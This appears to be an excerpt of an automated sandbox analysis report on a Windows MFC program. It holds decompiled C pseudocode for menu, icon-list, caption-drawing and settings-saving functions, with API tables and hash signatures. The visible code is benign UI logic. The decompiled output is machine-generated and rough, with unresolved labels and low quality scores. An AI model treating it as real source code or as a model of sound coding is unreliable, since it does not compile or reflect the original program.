							_push(0x400);
							L0042601E();
							GetMenuStringA( *(_t130 + 4),  *(_t133 - 0x10), 0x100, 0x100, 0x100);
							_push(0xffffffff);
							_t111 = _t133 - 0x14;
							L00426018();
							if(_t128 != 0) {
								_t128[0x10] = _t95 | 0x00000005;
								_t76 =  *((intOrPtr*)(_t133 - 0x14));
								if( *((intOrPtr*)( *((intOrPtr*)(_t133 - 0x14)) - 8)) > 0) {
									L00402117(_t128, _t76);
								}
								L19:
								ModifyMenuA( *(_t130 + 4),  *(_t133 - 0x10), _t128[0x10],  *(_t133 - 0x18), _t128);
								goto L20;
							}
							_push(_t111);
							 *((intOrPtr*)(_t133 - 0x20)) = _t136;
							_push(_t133 - 0x14);
							L0042611A();
							_push( *(_t133 - 0x18));
							_t97 = _t95 | 0x00000005;
							goto L14;
						}
						_t112 = _t130;
						_t128 = E004015F0(_t112, _t126);
						if(_t128 != 0) {
							goto L19;
						}
						_push(_t112);
						 *((intOrPtr*)(_t133 - 0x20)) = _t136;
						_push(0x4421f8);
						L00425FB8();
						_push(_t128);
						_t97 = _t95 | 0x0000000d;
						goto L14;
					}
				} else {
					_t123 =  *((intOrPtr*)(__ecx + 0xc));
					_t92 = _t67 + 1;
					do {
						_t124 =  *_t123;
						_t123 = _t123 + 4;
						_t92 = _t92 - 1;
						 *((intOrPtr*)(_t124 + 0x18)) = 0;
					} while (_t92 != 0);
					goto L3;
				}
			}

0x004165ee
0x004165f3
0x004165f8
0x004165fe
0x00416603
0x0041660a
0x0041660f
0x00416612
0x0041661a
0x0041661e
0x0041661f
0x00416624
0x00416635
0x00416638
0x00416643
0x004167e1
0x004167e3
0x004167eb
0x004167ed
0x004167f0
0x004167f5
0x004167fa
0x004167fb
0x00416800
0x00416802
0x00416806
0x0041680b
0x00416812
0x00416817
0x0041681e
0x00416828
0x00416831
0x00416831
0x0041664d
0x0041665e
0x00416663
0x00000000
0x00000000
0x0041666f
0x00416675
0x00416676
0x00416681
0x00416689
0x00416690
0x0041669a
0x004166a6
0x004166ac
0x004166ae
0x004166b1
0x004166b8
0x004166d9
0x004166e0
0x004166e9
0x004166e9
0x004167ba
0x004167bc
0x004167be
0x004167c2
0x004167c5
0x004167c5
0x004167cd
0x004167d9
0x0041664b
0x00000000
0x004167df
0x004167df
0x00000000
0x004167df
0x004167d9
0x004166ba
0x004166c0
0x004166c3
0x004166c4
0x004166c9
0x004166d2
0x0041671e
0x0041671e
0x00416721
0x00416729
0x00000000
0x004166f3
0x004166f6
0x0041673f
0x00416747
0x0041674e
0x00416758
0x00416764
0x0041676a
0x0041676c
0x0041676f
0x00416776
0x00416792
0x00416795
0x0041679c
0x004167a1
0x004167a1
0x004167a6
0x004167b4
0x00000000
0x004167b4
0x00416778
0x0041677e
0x00416781
0x00416782
0x00416787
0x0041678a
0x00000000
0x0041678a
0x004166f9
0x00416700
0x00416704
0x00000000
0x00000000
0x0041670a
0x0041670d
0x00416710
0x00416715
0x0041671a
0x0041671b
0x00000000
0x0041671b
0x00416626
0x00416626
0x00416629
0x0041662a
0x0041662a
0x0041662c
0x0041662f
0x00416630
0x00416630
0x00000000
0x0041662a

APIs

_EH_prolog.MSVCRT ref: 004165EE
#500.MFC42 ref: 004165FE
#540.MFC42 ref: 00416612
GetMenuItemCount.USER32 ref: 0041663B
GetMenuState.USER32 ref: 00416658
GetSubMenu.USER32 ref: 0041666F
#2863.MFC42(00000000), ref: 00416676
#2915.MFC42(00000100,00000100,00000400,00000000), ref: 0041669A
GetMenuStringA.USER32(00000001,00000000,00000000,00000100,00000100), ref: 004166A6
#5572.MFC42(000000FF), ref: 004166B1
#535.MFC42(?,?,000000FF), ref: 004166C4
#537.MFC42(004421F8), ref: 00416715
GetMenuItemID.USER32(00000001,?), ref: 00416736
#2915.MFC42(00000100,00000100,00000400), ref: 00416758
GetMenuStringA.USER32(00000001,?,00000000,00000100,00000100), ref: 00416764
#5572.MFC42(000000FF), ref: 0041676F
#535.MFC42(?,?,000000FF), ref: 00416782
ModifyMenuA.USER32(00000001,?,?,?,00000000), ref: 004167B4
#5860.MFC42(?,00000000,?,000000FF), ref: 004167C5
GetMenuItemCount.USER32 ref: 004167D0
#6142.MFC42(00000000,000000FF), ref: 004167F0
#1621.MFC42(0042E4FC,00000000,000000FF), ref: 004167FB
#6142.MFC42(00000000,000000FF,0042E4FC,00000000,000000FF), ref: 00416806
#800.MFC42(00000000,000000FF,0042E4FC,00000000,000000FF), ref: 00416812
#772.MFC42(00000000,000000FF,0042E4FC,00000000,000000FF), ref: 0041681E

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$#2915#535#5572#6142CountString$#1621#2863#500#537#540#5860#772#800H_prologModifyState
String ID:
API String ID: 1688199935-0
Opcode ID: 16c03e19aa8acc6173eee3f604f3b274446e5f42d4e7634a22419511f426bca1
Instruction ID: 41e20e616bb2e9df9e81541e086d70c4f2de00b0a43771748c3f596175697331
Opcode Fuzzy Hash: 16c03e19aa8acc6173eee3f604f3b274446e5f42d4e7634a22419511f426bca1
Instruction Fuzzy Hash: 7961D171A00114ABCB01EB95DE46AEEBBB6FF84304F11051EF426B32E1DB389940DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAE, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 167
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401BAE(intOrPtr __ecx, void* __fp0) {
				struct HWND__* _t78;
				struct HICON__* _t80;
				long _t86;
				long _t92;
				long _t98;
				struct HWND__* _t103;
				struct HWND__* _t105;
				int _t136;
				void* _t138;
				intOrPtr _t147;
				void* _t150;

				_t150 = __fp0;
				L004269E6();
				_t105 =  *(_t138 + 8);
				 *((intOrPtr*)(_t138 - 0x10)) = __ecx;
				if(_t105 != 0) {
					_t136 =  *(_t138 + 0x10);
					if(_t136 == 0 ||  *(_t138 + 0xc) < 0) {
						goto L10;
					} else {
						 *(_t138 + 0xc) = ImageList_GetIcon( *(_t105 + 4),  *(_t138 + 0xc), 0);
						ImageList_GetIconSize( *(_t105 + 4), _t138 - 0x14, _t138 + 0x10);
						_push(1);
						_push(1);
						_push(0xff);
						_push( *(_t138 + 0x10));
						_push( *(_t138 - 0x14));
						L00426000();
						ImageList_ReplaceIcon( *(_t136 + 4), 0xffffffff,  *(_t138 + 0xc));
						if(L0040214E(DestroyIcon( *(_t138 + 0xc))) != 0) {
							_t147 =  *0x440cfc; // 0x1
							if(_t147 != 0) {
								_t78 = L00401307();
								 *(_t138 + 8) = _t78;
								if(_t78 == 0) {
									_t103 = GetDesktopWindow();
									_push(_t103);
									L00426372();
									 *(_t138 + 8) = _t103;
								}
								_t80 = GetDC( *( *(_t138 + 8) + 0x20));
								_push(_t80);
								L00425FD0();
								 *(_t138 + 0xc) = _t80;
								 *(_t138 - 0x28) = 0;
								 *(_t138 - 0x2c) = 0x42e34c;
								 *((intOrPtr*)(_t138 - 4)) = 0;
								 *(_t138 - 0x20) = 0;
								 *(_t138 - 0x24) = 0x42e34c;
								 *(_t138 - 0x18) = 0;
								 *(_t138 - 0x1c) = 0x42e34c;
								_push(_t138 - 0x2c);
								_push(0);
								_push(_t136);
								 *((char*)(_t138 - 4)) = 2;
								_push( *(_t138 + 0xc));
								E004010A0();
								_push(_t138 - 0x2c);
								L0040227A();
								_t86 = GetSysColor(0xf);
								asm("sbb ecx, ecx");
								ImageList_AddMasked( *(_t136 + 4),  ~(_t138 - 0x2c) &  *(_t138 - 0x28), _t86);
								_push(_t138 - 0x24);
								_push(0);
								_push(_t136);
								_push( *(_t138 + 0xc));
								E004010A0();
								_push(_t138 - 0x24);
								L004019A6();
								_t92 = GetSysColor(0xf);
								asm("sbb ecx, ecx");
								ImageList_AddMasked( *(_t136 + 4),  ~(_t138 - 0x24) &  *(_t138 - 0x20), _t92);
								_push(_t138 - 0x1c);
								_push(0);
								_push(_t136);
								_push( *(_t138 + 0xc));
								E004010A0();
								_push(0);
								_push(_t138 - 0x1c);
								L00401221(_t150);
								_t98 = GetSysColor(0xf);
								asm("sbb ecx, ecx");
								ImageList_AddMasked( *(_t136 + 4),  ~(_t138 - 0x1c) &  *(_t138 - 0x18), _t98);
								ReleaseDC( *( *(_t138 + 8) + 0x20),  *( *(_t138 + 0xc) + 4));
								 *(_t138 - 0x1c) = 0x42c514;
								 *((char*)(_t138 - 4)) = 3;
								L00425FA6();
								 *(_t138 - 0x24) = 0x42c514;
								 *(_t138 - 0x1c) = 0x42c4fc;
								 *((char*)(_t138 - 4)) = 4;
								L00425FA6();
								 *(_t138 - 0x24) = 0x42c4fc;
								 *(_t138 - 0x2c) = 0x42c514;
								 *((intOrPtr*)(_t138 - 4)) = 5;
								L00425FA6();
							}
						}
						_push(1);
						_pop(0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
				return 0;
			}

0x00401bae
0x00418610
0x00418619
0x00418620
0x00418625
0x0041862b
0x00418630
0x00000000
0x0041863f
0x0041864c
0x0041865a
0x00418660
0x00418662
0x00418664
0x0041866b
0x0041866e
0x00418671
0x0041867e
0x00418694
0x0041869a
0x004186a0
0x004186a6
0x004186ad
0x004186b0
0x004186b2
0x004186b8
0x004186b9
0x004186be
0x004186be
0x004186c7
0x004186cd
0x004186ce
0x004186d3
0x004186db
0x004186de
0x004186e1
0x004186e4
0x004186e7
0x004186ea
0x004186ed
0x004186f6
0x004186f7
0x004186f8
0x004186f9
0x004186fd
0x00418700
0x0041870b
0x0041870c
0x00418719
0x00418726
0x00418730
0x00418738
0x00418739
0x0041873b
0x0041873c
0x0041873f
0x0041874a
0x0041874b
0x00418752
0x0041875a
0x00418763
0x0041876b
0x0041876c
0x0041876e
0x0041876f
0x00418772
0x0041877d
0x0041877f
0x00418780
0x00418787
0x0041878f
0x00418798
0x004187a6
0x004187b1
0x004187b7
0x004187bb
0x004187c5
0x004187c8
0x004187ce
0x004187d2
0x004187d7
0x004187da
0x004187e0
0x004187e7
0x004187e7
0x004186a0
0x004187ec
0x004187ee
0x004187ee
0x00418630
0x004187f9
0x00418801

APIs

_EH_prolog.MSVCRT ref: 00418610
ImageList_GetIcon.COMCTL32(?,?,00000000), ref: 00418646
ImageList_GetIconSize.COMCTL32(?,?,?), ref: 0041865A
#2096.MFC42(?,?,000000FF,00000001,00000001), ref: 00418671
ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,000000FF,00000001,00000001), ref: 0041867E
DestroyIcon.USER32(?), ref: 00418687
GetDesktopWindow.USER32 ref: 004186B2
#2864.MFC42(00000000), ref: 004186B9
GetDC.USER32(?), ref: 004186C7
#2859.MFC42(00000000), ref: 004186CE
GetSysColor.USER32(0000000F), ref: 00418719
ImageList_AddMasked.COMCTL32(00000002,?,00000000), ref: 00418730
GetSysColor.USER32(0000000F), ref: 00418752
ImageList_AddMasked.COMCTL32(00000002,?,00000000), ref: 00418763
GetSysColor.USER32(0000000F), ref: 00418787
ImageList_AddMasked.COMCTL32(00000002,?,00000000), ref: 00418798
ReleaseDC.USER32 ref: 004187A6
#2414.MFC42 ref: 004187BB
#2414.MFC42 ref: 004187D2
#2414.MFC42 ref: 004187E7

Strings

LB, xrefs: 004186D6

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ImageList_$Icon$#2414ColorMasked$#2096#2859#2864DesktopDestroyH_prologReleaseReplaceSizeWindow
String ID: LB
API String ID: 1703334551-3532020319
Opcode ID: a018d8931baeb8405c85052a950c20b24f9051931b97995849d47c9748aa0856
Instruction ID: 3826c4f9e3e202968de83810b1618689038b0a24ef4f6af25709226c9ceba32f
Opcode Fuzzy Hash: a018d8931baeb8405c85052a950c20b24f9051931b97995849d47c9748aa0856
Instruction Fuzzy Hash: EC512871900119ABCF10DFA5DD45AEEBBB8FF48304F10812AF525A71A1DB799A40CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00401087, Relevance: 34.8, APIs: 23, Instructions: 334
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00401087(intOrPtr __ecx) {
				void* _t143;
				int _t144;
				intOrPtr _t150;
				signed char _t151;
				intOrPtr _t165;
				int _t170;
				long _t171;
				int* _t179;
				intOrPtr _t194;
				intOrPtr _t199;
				signed char _t201;
				CHAR* _t209;
				intOrPtr _t215;
				signed int _t221;
				int _t222;
				signed int _t230;
				intOrPtr _t233;
				int _t247;
				signed int _t259;
				struct tagRECT _t265;
				intOrPtr _t267;
				int _t268;
				intOrPtr _t271;
				int _t286;
				signed int _t287;
				signed int _t289;
				intOrPtr _t292;
				intOrPtr _t294;
				intOrPtr _t295;
				intOrPtr _t298;
				signed int _t300;
				signed int _t303;
				signed int _t304;
				signed int _t309;
				void* _t312;

				L004269E6();
				_t199 = __ecx;
				 *((intOrPtr*)(_t312 - 0x50)) = __ecx;
				_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0x114))();
				if(_t143 != 0) {
					_t144 = L004020E0(__ecx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t267 =  *((intOrPtr*)(__ecx + 0xf8));
					 *(_t312 - 0x40) = _t144;
					asm("movsd");
					_t298 =  *((intOrPtr*)(__ecx + 0xfc));
					_t286 = 0;
					if(_t144 == 0) {
						_t215 =  *((intOrPtr*)(_t312 + 0x10)) -  *((intOrPtr*)(__ecx + 0xec)) - 1;
						 *((intOrPtr*)(_t312 - 0x18)) = _t215;
						_t268 = _t267 + 0xfffffffd;
						__eflags = _t268;
						 *((intOrPtr*)(_t312 - 0x10)) = _t215 + 0xb;
						 *(_t312 - 0x14) = _t268;
					} else {
						_t265 =  *((intOrPtr*)(_t312 + 0xc)) -  *((intOrPtr*)(__ecx + 0xec)) - 1;
						 *(_t312 - 0x1c) = _t265;
						 *(_t312 - 0x14) = _t265 + 0xb;
						 *((intOrPtr*)(_t312 - 0x18)) = _t298 + 0xe;
					}
					InflateRect(_t312 - 0x1c, 0 | _t144 != _t286, 0 | _t144 == _t286);
					if( *((intOrPtr*)(_t199 + 0x100)) == _t286) {
						_t201 = GetSysColor(3);
					} else {
						_t201 = GetSysColor(2);
					}
					 *(_t312 - 0x54) = _t286;
					SystemParametersInfoA(0x1008, _t286, _t312 - 0x54, _t286);
					if( *(_t312 - 0x54) != _t286) {
						_t150 =  *((intOrPtr*)(_t312 - 0x50));
						__eflags =  *((intOrPtr*)(_t150 + 0x100)) - _t286;
						if( *((intOrPtr*)(_t150 + 0x100)) == _t286) {
							_push(0x1c);
						} else {
							_push(0x1b);
						}
						_t151 = GetSysColor();
						 *(_t312 + 0x18) = _t286;
						_t221 = _t201 & 0x000000ff;
						_t287 = _t201 >> 0x00000010 & 0x000000ff;
						 *(_t312 - 0x44) = _t151 >> 0x00000010 & 0x000000ff;
						 *(_t312 - 0x5c) = _t151 & 0x000000ff;
						_t300 = _t201 & 0x000000ff;
						 *(_t312 - 0x3c) =  ~_t287;
						 *(_t312 - 0x30) =  ~_t300;
						_t271 = 0;
						 *(_t312 - 0x38) = _t287 << 6;
						_t289 = _t300 << 6;
						 *(_t312 - 0x60) = _t151 & 0x000000ff;
						_t209 =  *(_t312 + 8);
						 *((intOrPtr*)(_t312 - 0x2c)) = 0;
						_t222 = _t221 << 6;
						__eflags = _t222;
						 *((intOrPtr*)(_t312 - 0x28)) = 0;
						 *((intOrPtr*)(_t312 - 0x58)) = 0;
						 *(_t312 - 0x64) =  ~_t221;
						 *(_t312 - 0x4c) = _t289;
						 *(_t312 - 0x48) = _t222;
						do {
							 *(_t312 + 8) =  *((intOrPtr*)(_t312 - 0x28)) + _t289 >> 6;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							__eflags =  *(_t312 - 0x40);
							 *(_t312 + 8) = 0 << 0x00000008 | _t222 + _t271 >> 0x00000006 & 0x000000ff;
							asm("movsd");
							if( *(_t312 - 0x40) == 0) {
								_t303 =  *(_t312 + 0x18);
								_t230 =  *(_t312 - 0x14) -  *(_t312 - 0x1c);
								_t165 = (_t230 * _t303 >> 6) +  *(_t312 - 0x1c);
								_t304 = _t303 + 1;
								_t233 = (_t230 * _t304 >> 6) +  *(_t312 - 0x1c);
								 *((intOrPtr*)(_t312 - 0x74)) = _t165;
								 *((intOrPtr*)(_t312 - 0x6c)) = _t233;
								__eflags = _t233 - _t165;
							} else {
								_t294 =  *((intOrPtr*)(_t312 - 0x10));
								_t309 =  *(_t312 + 0x18);
								_t259 = _t294 -  *((intOrPtr*)(_t312 - 0x18));
								_t194 = _t294 - (_t259 * _t309 >> 6);
								_t304 = _t309 + 1;
								_t295 = _t294 - (_t259 * _t304 >> 6);
								 *((intOrPtr*)(_t312 - 0x68)) = _t194;
								 *((intOrPtr*)(_t312 - 0x70)) = _t295;
								__eflags = _t194 - _t295;
							}
							if(__eflags > 0) {
								_push( *(_t312 + 8));
								_push(_t312 - 0x74);
								L004264C8();
							}
							 *((intOrPtr*)(_t312 - 0x28)) =  *((intOrPtr*)(_t312 - 0x28)) +  *(_t312 - 0x60);
							 *(_t312 - 0x38) =  *(_t312 - 0x38) +  *(_t312 - 0x3c);
							_t271 =  *((intOrPtr*)(_t312 - 0x58)) +  *(_t312 - 0x5c);
							_t222 =  *(_t312 - 0x48) +  *(_t312 - 0x64);
							_t289 =  *(_t312 - 0x4c) +  *(_t312 - 0x30);
							 *((intOrPtr*)(_t312 - 0x2c)) =  *((intOrPtr*)(_t312 - 0x2c)) +  *(_t312 - 0x44);
							__eflags = _t304 - 0x40;
							 *(_t312 + 0x18) = _t304;
							 *((intOrPtr*)(_t312 - 0x58)) = _t271;
							 *(_t312 - 0x48) = _t222;
							 *(_t312 - 0x4c) = _t289;
						} while (_t304 < 0x40);
						_t286 = 0;
						__eflags = 0;
					} else {
						_push(_t201);
						_t209 =  *(_t312 + 8);
						_push(_t312 - 0x1c);
						L004264C8();
					}
					 *(_t312 - 0x20) = _t286;
					 *((intOrPtr*)(_t312 - 0x24)) = 0x42dce0;
					 *(_t312 - 4) = _t286;
					_t170 = MulDiv(0x55, 0x60, GetDeviceCaps(_t209[8], 0x58));
					_t292 =  *((intOrPtr*)(_t312 - 0x50));
					_push(0);
					_push( *((intOrPtr*)(_t292 + 0x104)));
					_push(_t170);
					L004264C2();
					if(_t170 != 0) {
						if( *((intOrPtr*)(_t292 + 0x100)) == 0) {
							_push(0x13);
						} else {
							_push(9);
						}
						_t171 = GetSysColor();
						L00425FBE();
						 *(_t312 - 0x44) = _t171;
						 *(_t312 - 0x3c) =  *((intOrPtr*)( *_t209 + 0x38))(_t171, 1);
						if( *(_t312 - 0x40) != 0) {
							GetObjectA( *(_t312 - 0x20), 0x3c, _t312 - 0xb0);
							L00425FA6();
							 *((intOrPtr*)(_t312 - 0xa8)) = 0x384;
							_push(CreateFontIndirectA(_t312 - 0xb0));
							L004264BC();
						}
						 *(_t312 + 0x18) =  *((intOrPtr*)( *_t209 + 0x30))(_t312 - 0x24);
						L00425E08();
						_push(_t312 + 8);
						 *(_t312 - 4) = 1;
						L00426246();
						if( *(_t312 - 0x40) == 0) {
							_t247 =  *(_t312 - 0x1c) + 3;
							__eflags = _t247;
							 *(_t312 - 0x30) =  *((intOrPtr*)(_t312 - 0x18)) - 1;
							 *(_t312 - 0x34) = _t247;
							_t179 = _t312 - 0x34;
						} else {
							 *(_t312 - 0x30) =  *((intOrPtr*)(_t312 - 0x10)) + 0xfffffffd;
							 *(_t312 - 0x34) =  *(_t312 - 0x1c) - 1;
							_t179 = _t312 - 0x34;
						}
						ExtTextOutA(_t209[4],  *_t179, _t179[1], 4, _t312 - 0x1c,  *(_t312 + 8),  *( *(_t312 + 8) - 8), 0);
						 *((intOrPtr*)( *_t209 + 0x30))( *(_t312 + 0x18));
						L00425FBE();
						 *((intOrPtr*)( *_t209 + 0x38))( *(_t312 - 0x3c),  *(_t312 - 0x44));
						 *(_t312 - 4) =  *(_t312 - 4) & 0x00000000;
						L00425DFC();
					}
					_push(_t209);
					_t143 = L00401DFC(_t292 + 0xf0);
					 *((intOrPtr*)(_t312 - 0x24)) = 0x42c514;
					 *(_t312 - 4) = 2;
					L00425FA6();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t312 - 0xc));
				return _t143;
			}

0x0040f008
0x0040f014
0x0040f016
0x0040f01b
0x0040f023
0x0040f02d
0x0040f038
0x0040f039
0x0040f03a
0x0040f03b
0x0040f041
0x0040f044
0x0040f045
0x0040f04b
0x0040f04f
0x0040f075
0x0040f076
0x0040f07c
0x0040f07c
0x0040f07f
0x0040f082
0x0040f051
0x0040f05a
0x0040f05b
0x0040f064
0x0040f067
0x0040f067
0x0040f099
0x0040f0a5
0x0040f0c3
0x0040f0a7
0x0040f0b1
0x0040f0b1
0x0040f0d0
0x0040f0d3
0x0040f0dc
0x0040f0f2
0x0040f0f5
0x0040f0fb
0x0040f101
0x0040f0fd
0x0040f0fd
0x0040f0fd
0x0040f103
0x0040f107
0x0040f10a
0x0040f112
0x0040f11d
0x0040f127
0x0040f12c
0x0040f131
0x0040f138
0x0040f146
0x0040f148
0x0040f14d
0x0040f14f
0x0040f152
0x0040f155
0x0040f158
0x0040f158
0x0040f15b
0x0040f15e
0x0040f161
0x0040f164
0x0040f167
0x0040f16a
0x0040f17e
0x0040f184
0x0040f18c
0x0040f198
0x0040f19e
0x0040f1a2
0x0040f1a5
0x0040f1a6
0x0040f1d7
0x0040f1da
0x0040f1e5
0x0040f1e8
0x0040f1ef
0x0040f1f2
0x0040f1f5
0x0040f1fa
0x0040f1a8
0x0040f1a8
0x0040f1ab
0x0040f1b2
0x0040f1bd
0x0040f1bf
0x0040f1c6
0x0040f1c8
0x0040f1cd
0x0040f1d0
0x0040f1d0
0x0040f1fc
0x0040f1fe
0x0040f206
0x0040f207
0x0040f207
0x0040f212
0x0040f21e
0x0040f224
0x0040f227
0x0040f22a
0x0040f22d
0x0040f230
0x0040f233
0x0040f236
0x0040f239
0x0040f23c
0x0040f23c
0x0040f24b
0x0040f24b
0x0040f0de
0x0040f0de
0x0040f0df
0x0040f0e7
0x0040f0e8
0x0040f0e8
0x0040f24d
0x0040f250
0x0040f259
0x0040f26a
0x0040f270
0x0040f273
0x0040f27b
0x0040f27c
0x0040f280
0x0040f287
0x0040f294
0x0040f29a
0x0040f296
0x0040f296
0x0040f296
0x0040f29c
0x0040f2a4
0x0040f2a9
0x0040f2b8
0x0040f2bb
0x0040f2c9
0x0040f2d2
0x0040f2dd
0x0040f2ee
0x0040f2f2
0x0040f2f2
0x0040f305
0x0040f308
0x0040f312
0x0040f313
0x0040f317
0x0040f320
0x0040f33e
0x0040f33e
0x0040f341
0x0040f344
0x0040f347
0x0040f322
0x0040f32c
0x0040f32f
0x0040f332
0x0040f332
0x0040f364
0x0040f371
0x0040f379
0x0040f385
0x0040f388
0x0040f38f
0x0040f38f
0x0040f394
0x0040f39b
0x0040f3a0
0x0040f3aa
0x0040f3b1
0x0040f3b7
0x0040f3bc
0x0040f3c4

APIs

_EH_prolog.MSVCRT ref: 0040F008
InflateRect.USER32(?,00000000,00000000), ref: 0040F099
GetSysColor.USER32(00000002), ref: 0040F0AF
GetSysColor.USER32(00000003), ref: 0040F0B7
SystemParametersInfoA.USER32(00001008,00000000,?,00000000), ref: 0040F0D3
#2754.MFC42(?,00000000), ref: 0040F0E8
GetSysColor.USER32(0000001C), ref: 0040F103
#2754.MFC42(?,?), ref: 0040F207
GetDeviceCaps.GDI32(?,00000058), ref: 0040F25F
MulDiv.KERNEL32(00000055,00000060,00000000), ref: 0040F26A
#2243.MFC42(00000000,?,00000000), ref: 0040F280
GetSysColor.USER32(00000013), ref: 0040F29C
#5875.MFC42(00000001), ref: 0040F2A4
GetObjectA.GDI32(?,0000003C,?), ref: 0040F2C9
#2414.MFC42 ref: 0040F2D2
CreateFontIndirectA.GDI32(?), ref: 0040F2E8
#1641.MFC42(00000000), ref: 0040F2F2
#540.MFC42 ref: 0040F308
#3874.MFC42(?), ref: 0040F317
ExtTextOutA.GDI32(00000001,?,?,00000004,?,?,?,00000000), ref: 0040F364
#5875.MFC42(?), ref: 0040F379
#800.MFC42 ref: 0040F38F
#2414.MFC42(?,00000000,?,00000000), ref: 0040F3B1

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$#2414#2754#5875$#1641#2243#3874#540#800CapsCreateDeviceFontH_prologIndirectInflateInfoObjectParametersRectSystemText
String ID:
API String ID: 1887894383-0
Opcode ID: b2add50e8b4f45ccbb4bfa1cc3b9249e4d459584d21c90db2a546ab98819a46c
Instruction ID: 4b563bd0a791b9b6d2ae0b1799790c48993804ae7dd53716822bd4958d1cb052
Opcode Fuzzy Hash: b2add50e8b4f45ccbb4bfa1cc3b9249e4d459584d21c90db2a546ab98819a46c
Instruction Fuzzy Hash: 40D15C71E00219DFCB18DFA9D895AEEBBB5BF48300F14813EE806AB391D7746A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401096, Relevance: 33.3, APIs: 11, Strings: 8, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00401096(void* __ecx) {
				void* _t25;
				void* _t40;
				void* _t42;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_t40 = __ecx;
				L00426252();
				SendMessageA( *(__ecx + 0xb0), 0x466, 0, _t42 - 0x14);
				_push( *(_t42 - 0x14));
				_push("IPAdress");
				_push("Settings");
				L0042624C();
				_push(SendMessageA( *(_t40 + 0x130), 0x468, 0, 0));
				_push("PortNumber");
				_push("Settings");
				L0042624C();
				L00425E08();
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_push(_t42 - 0x10);
				L00426246();
				_push( *((intOrPtr*)(_t42 - 0x10)));
				_push("SignInName");
				_push("Settings");
				L00426240();
				_t25 = L00402077(_t40 + 0x1d0);
				_push(_t25);
				_push("SignIndex");
				_push("Settings");
				L0042624C();
				 *(_t42 - 4) =  *(_t42 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t25;
			}

0x0040bca2
0x0040bca7
0x0040bca8
0x0040bcab
0x0040bcad
0x0040bcc9
0x0040bccb
0x0040bcd4
0x0040bcd9
0x0040bcde
0x0040bcfa
0x0040bcfb
0x0040bd00
0x0040bd05
0x0040bd0d
0x0040bd12
0x0040bd19
0x0040bd20
0x0040bd25
0x0040bd2e
0x0040bd33
0x0040bd38
0x0040bd43
0x0040bd4e
0x0040bd4f
